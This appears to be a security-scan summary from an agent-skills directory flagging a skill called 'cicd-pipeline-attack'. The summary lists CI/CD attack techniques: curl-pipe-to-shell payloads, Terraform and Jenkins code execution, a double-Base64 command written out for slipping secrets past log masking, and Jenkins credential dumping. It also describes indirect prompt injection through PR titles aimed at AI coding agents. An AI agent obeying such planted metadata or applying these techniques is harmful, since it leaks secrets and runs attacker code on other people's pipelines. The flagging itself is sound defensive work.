The Agent Skills Directory

[REMOTE_CODE_EXECUTION]: The skill provides numerous payloads and methodology for executing arbitrary code on CI/CD runners and servers. Examples include:
Use of curl | sh patterns with remote URLs (e.g., https://attacker.com/sh).
Exploitation of Terraform external data sources and local-exec provisioners to run commands during planning and application phases.
Abuse of Jenkins Groovy Script Console for direct server-side execution.
[DATA_EXFILTRATION]: Instructions are provided for extracting sensitive information such as environment variables and CI/CD secrets. This includes:
Techniques to bypass logging masks using multi-layered Base64 encoding (e.g., echo '${{ toJson(secrets) }}' | base64 -w0 | base64 -w0).
Methods for reading and exfiltrating cloud provider credentials (AWS AK/SK, GCP Service Accounts) and VCS tokens.
[COMMAND_EXECUTION]: The methodology covers various ways to execute commands by manipulating CI/CD configuration files (D-PPE) and their dependencies (I-PPE).
Details on abusing pull_request_target and issue_comment triggers to execute malicious code within a privileged context.
Guidance on interacting with the Docker API and internal network services from self-hosted runners.
[CREDENTIALS_UNSAFE]: The skill contains detailed procedures for dumping and decrypting credentials from Jenkins (credentials.xml, master.key) and harvesting cloud credentials from file systems and environment variables.
[PROMPT_INJECTION]: The skill identifies and describes techniques for indirect prompt injection targeting AI agents used in CI/CD workflows, specifically through the manipulation of PR and issue metadata. For instance, it details how attackers can manipulate PR titles to exploit Claude Code Action's tool-calling capabilities.

cicd-pipeline-attack